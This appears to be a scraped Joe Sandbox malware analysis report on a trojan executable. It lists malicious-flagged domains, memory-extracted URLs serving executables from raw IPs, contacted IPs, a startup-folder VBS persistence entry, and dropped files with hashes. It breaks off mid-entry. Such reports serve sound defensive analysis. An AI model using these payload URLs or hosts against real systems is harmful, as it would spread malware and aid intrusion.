                                                                                                                                                                                                                                              http://tnevuluw.biz/ejbrogxxiitrue
                                                                                                                                                                                                                                                http://lpuegx.biz/ubxmipvolouhvxtrue
                                                                                                                                                                                                                                                  http://ssbzmoy.biz/akytrue
                                                                                                                                                                                                                                                    http://vgypotwp.biz/owaltrue
                                                                                                                                                                                                                                                      http://zyiexezl.biz/oedtvtrue
                                                                                                                                                                                                                                                        http://jpskm.biz/qgorjabxoatrue
                                                                                                                                                                                                                                                          http://ytctnunms.biz/aetrue
                                                                                                                                                                                                                                                            http://brsua.biz/ieicusmwhtrue
                                                                                                                                                                                                                                                              http://qaynky.biz/slnbsufsiblmtrue
                                                                                                                                                                                                                                                                http://tbjrpv.biz/suofoicottrue
                                                                                                                                                                                                                                                                  http://saytjshyf.biz/oxhtjjhhtrbhtrue
                                                                                                                                                                                                                                                                    http://nwdnxrd.biz/miwimxtpafcutrue
                                                                                                                                                                                                                                                                      http://zgapiej.biz/lnsmaljotrue
                                                                                                                                                                                                                                                                        http://sctmku.biz/gbktrue
                                                                                                                                                                                                                                                                          http://giliplg.biz/hxjrtfgkatrue
                                                                                                                                                                                                                                                                            http://myups.biz/lldlbyoesphcqdkftrue
                                                                                                                                                                                                                                                                              http://oshhkdluh.biz/mitdmmperwbttrue
                                                                                                                                                                                                                                                                                http://myups.biz/uwmqwimibwapaytrue
                                                                                                                                                                                                                                                                                  http://knjghuig.biz/ibdxbfqrqufvuutrue
                                                                                                                                                                                                                                                                                    http://vrrazpdh.biz/jweaqenrkqbotrue
                                                                                                                                                                                                                                                                                      http://rffxu.biz/ugprctrue
                                                                                                                                                                                                                                                                                        http://nwdnxrd.biz/suaydtrue
                                                                                                                                                                                                                                                                                          http://dyjdrp.biz/cftuaqttrue
                                                                                                                                                                                                                                                                                            http://hlzfuyy.biz/wibvfidtxetrue
                                                                                                                                                                                                                                                                                              http://gytujflc.biz/rgqdiitmqximtrue
                                                                                                                                                                                                                                                                                                http://rrqafepng.biz/ohyfmaqfmywgestrue
                                                                                                                                                                                                                                                                                                  http://sctmku.biz/vrswaovbjfotrue
                                                                                                                                                                                                                                                                                                    http://xccjj.biz/quoefwkpxbtrue
                                                                                                                                                                                                                                                                                                      http://vjaxhpbji.biz/liartrue
                                                                                                                                                                                                                                                                                                        http://cvgrf.biz/elpwpttrue
                                                                                                                                                                                                                                                                                                          http://gytujflc.biz/frmapjmyitrue
                                                                                                                                                                                                                                                                                                            http://hehckyov.biz/gkelppguisaupstrue
                                                                                                                                                                                                                                                                                                              http://jlqltsjvh.biz/ekoddjskuurntxlltrue
                                                                                                                                                                                                                                                                                                                http://gnqgo.biz/jtyrnesofmrmctrue
                                                                                                                                                                                                                                                                                                                  http://kkqypycm.biz/qktrue
                                                                                                                                                                                                                                                                                                                    http://qvuhsaqa.biz/koqlarnbbmmihcqktrue
                                                                                                                                                                                                                                                                                                                      http://kcyvxytog.biz/nwtkmxcykxtrue
                                                                                                                                                                                                                                                                                                                        http://bzkysubds.biz/tqwtrue
                                                                                                                                                                                                                                                                                                                          http://sxmiywsfv.biz/ncsttrue
                                                                                                                                                                                                                                                                                                                            http://jifai.biz/ewnrtrue
                                                                                                                                                                                                                                                                                                                              http://pectx.biz/ylviltyasnotrue
                                                                                                                                                                                                                                                                                                                                http://wxgzshna.biz/ghyfalse
                                                                                                                                                                                                                                                                                                                                  http://banwyw.biz/pfxvtrue
                                                                                                                                                                                                                                                                                                                                    http://ecxbwt.biz/yefflviajtrue
                                                                                                                                                                                                                                                                                                                                      http://jlqltsjvh.biz/ogtrue
                                                                                                                                                                                                                                                                                                                                        http://tltxn.biz/dwgnvhktrue
                                                                                                                                                                                                                                                                                                                                          http://uaafd.biz/flkouthsltrue
                                                                                                                                                                                                                                                                                                                                            http://apzzls.biz/octbtrue
                                                                                                                                                                                                                                                                                                                                              http://vyome.biz/sopratrue
                                                                                                                                                                                                                                                                                                                                                http://yhqqc.biz/jqutrue
                                                                                                                                                                                                                                                                                                                                                  http://jpskm.biz/phssgedctrue
                                                                                                                                                                                                                                                                                                                                                    http://lpuegx.biz/ipnvntrue
                                                                                                                                                                                                                                                                                                                                                      http://warkcdu.biz/hhgpponstrue
                                                                                                                                                                                                                                                                                                                                                        http://vcddkls.biz/feejetjxxjumqwtrue
                                                                                                                                                                                                                                                                                                                                                          http://wluwplyh.biz/vuxtrue
                                                                                                                                                                                                                                                                                                                                                            http://cvgrf.biz/tacyehqtrue
                                                                                                                                                                                                                                                                                                                                                              http://knjghuig.biz/iejxbuficdbctrue
                                                                                                                                                                                                                                                                                                                                                                http://vgypotwp.biz/ftgaslpyptrue
                                                                                                                                                                                                                                                                                                                                                                  http://eufxebus.biz/tywwnhatrue
                                                                                                                                                                                                                                                                                                                                                                    http://cvgrf.biz/hbjtrue
                                                                                                                                                                                                                                                                                                                                                                      http://opowhhece.biz/jkmxqkwmcvmotrue
                                                                                                                                                                                                                                                                                                                                                                        http://damcprvgv.biz/dapmbtrue
                                                                                                                                                                                                                                                                                                                                                                          http://kcyvxytog.biz/utmatjvdttvmjtrue
                                                                                                                                                                                                                                                                                                                                                                            http://wluwplyh.biz/fhnitrue
                                                                                                                                                                                                                                                                                                                                                                              http://pwlqfu.biz/kyoprhcrfsmtrue

                                                                                                                                                                                                                                                                                                                                                                                URLs from Memory and Binaries

                                                                                                                                                                                                                                                                                                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                                                                                                                                                                http://82.112.184.197/w.alg.exe, 00000008.00000003.2033350591.0000000000560000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                  http://47.129.31.212:80/hsvchost.exe, 00000006.00000003.2551581839.00000000030A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                    http://18.141.10.107/bcalg.exe, 00000008.00000003.2531077401.000000000055D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                      http://3.94.10.34/rkgoodhecptjykclalg.exe, 00000008.00000003.2678532380.0000000000581000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2724357178.000000000057E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2735370442.000000000057C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                        http://34.246.200.160/ioljnnvkrvcsvchost.exe, 00000006.00000003.2395862116.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                          http://47.129.31.212/fwbtaqdcjwdsvchost.exe, 00000006.00000003.2395862116.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                            http://82.112.184.197/liaralg.exe, 00000008.00000003.2250815667.0000000000560000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2274270451.0000000000565000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2273228432.0000000000560000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                              http://54.244.188.177:80/hbjalg.exe, 00000008.00000003.1935095606.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1922932295.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1913832298.0000000000558000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                http://82.112.184.197/eyywnnlobvqfgsalg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                  http://172.234.222.143:80/xjjgalg.exe, 00000008.00000003.2251017479.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2033579316.0000000000558000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                    http://35.164.78.200/gxnuggiifqdalg.exe, 00000008.00000003.3072571369.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3042269569.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3023182878.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3013990554.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3053741021.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2981382953.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3081392177.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2962263699.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3096626159.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3033736358.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3091151676.00000000005D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                      http://34.211.97.45/vbfsvakjwaxalg.exe, 00000008.00000003.2818358771.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2789761856.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2768064977.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2839959599.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2751327328.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2734340919.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2802220414.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                        http://82.112.184.197/ipnvn$alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2316109693.000000000053E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                          http://208.100.26.245/pboamknlalg.exe, 00000008.00000003.2396437927.0000000000573000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                            http://54.244.188.177/scdrsalg.exe, 00000008.00000003.2876522612.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                              http://44.221.84.105/lyeldophhxwhalg.exe, 00000008.00000003.3137092544.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3163550787.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3191302720.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3179831563.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3142560146.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3120974183.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3170087253.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3201005428.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3154349720.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3149933208.00000000005D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                http://172.234.222.143/$alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  http://18.141.10.107/akyalg.exe, 00000008.00000003.1922932295.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905150358.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905662972.000000000053E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                    http://34.246.200.160/fxeavmroscrKGalg.exe, 00000008.00000003.2935944224.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2953580866.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2981382953.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2962263699.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2913758256.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2931823808.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                      http://208.100.26.245/ewjlslyiisfsvchost.exe, 00000006.00000003.2395862116.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        http://47.129.31.212/vvlfkuqnalg.exe, 00000008.00000003.2723489835.00000000005CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                          http://54.244.188.177:80/elpwptalg.exe, 00000008.00000003.1935095606.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1922932295.0000000000558000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                            http://172.234.222.143/0alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                                                                                                                                              165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		19574CSCUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                              3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              		uaafd.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              		unknownCanada
                                                                                                                                                                                                                                                                                                                                                                                                                              		64236UNREAL-SERVERSUStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              3.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              		ytctnunms.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              34.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              		tbjrpv.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              		przvgke.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		20940AKAMAI-ASN1EUtrue
                                                                                                                                                                                                                                                                                                                                                                                                                              18.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              		kcyvxytog.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              34.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              		apzzls.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              		yunalwv.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		32748STEADFASTUStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              35.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              		sctmku.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                                                                                                                                                              165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              		myups.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		19574CSCUStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              44.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              		ereplfx.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              72.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              		wxgzshna.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		32244LIQUIDWEBUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                              44.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              		bumxkqgxu.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              85.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              		dlynankz.bizGermany
                                                                                                                                                                                                                                                                                                                                                                                                                              		6724STRATOSTRATOAGDEtrue
                                                                                                                                                                                                                                                                                                                                                                                                                              54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              		nlscndwp.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              		xnxvnn.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              47.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              		qncdaagct.bizCanada
                                                                                                                                                                                                                                                                                                                                                                                                                              		34533ESAMARA-ASRUtrue
                                                                                                                                                                                                                                                                                                                                                                                                                              82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              		vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                                                                                                                                                                                                                              		43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUtrue
                                                                                                                                                                                                                                                                                                                                                                                                                              18.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              		ssbzmoy.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02UStrue

                                                                                                                                                                                                                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                                                                                                                                                              Analysis ID:1529033
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date and time:2024-10-08 15:26:46 +02:00
                                                                                                                                                                                                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                                                                                                                                              Overall analysis duration:0h 16m 20s
                                                                                                                                                                                                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                                                                                                                                              Number of analysed new started processes analysed:38
                                                                                                                                                                                                                                                                                                                                                                                                                              Number of new started drivers analysed:3
                                                                                                                                                                                                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                                                                                                                              Sample name:tyRPPK48Mk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                                                                                                                                                                                                                                              Original Sample Name:35a056cc53702fd3c3d9f0624eadae17b0e00ac7f18ffd50b6a708cc27183441.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                                                                                                                                                                                                              Classification:mal100.spre.troj.expl.evad.winEXE@36/157@327/21
                                                                                                                                                                                                                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Successful, ratio: 88.9%
                                                                                                                                                                                                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Successful, ratio: 95%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Number of executed functions: 71
                                                                                                                                                                                                                                                                                                                                                                                                                              • Number of non-executed functions: 298
                                                                                                                                                                                                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                                                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                                                                                                                                                                                                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, DiagnosticsHub.StandardCollector.Service.exe, SearchProtocolHost.exe, SIHClient.exe, conhost.exe, VSSVC.exe, WmiApSrv.exe, SearchIndexer.exe, svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                                              • Execution Graph export aborted for target svchost.exe, PID 4476 because there are no executed function
                                                                                                                                                                                                                                                                                                                                                                                                                              • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • VT rate limit hit for: tyRPPK48Mk.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                                                                                                                                                                                                                              09:27:55API Interceptor2352406x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                                              09:27:58API Interceptor167x Sleep call for process: alg.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                                              09:28:37API Interceptor200x Sleep call for process: msdtc.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                                              09:31:16API Interceptor1x Sleep call for process: elevation_service.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                                              09:31:53API Interceptor1x Sleep call for process: PerceptionSimulationService.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                                              14:27:51AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

                                                                                                                                                                                                                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1353216
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.324361132136671
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:nC4VQjGARQNhifXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:nOCAR0ifsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:564A5FEF46447DB5471426BBE0BBAF2B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:612AEA6569ED54639C78DBFAEBDB508E8FD5A274
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F3AF8E14CC00898C232DED5CDA71342C006F8897BDA68B6E1398113204A35B6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5A7203A606F5A174F2817E1135E587D68FCECD7BBB7B0B56444EC6AA304BBA26AF0D7E29CBC14B715EF03E18D7F607254C6657894E213479ACD3361089BB1522
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!.....0n......................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1294848
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.282670855701376
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:9NUpaKghsXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9CMKgusqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6BFA68DB2428D8234CF8B62F71AA5230
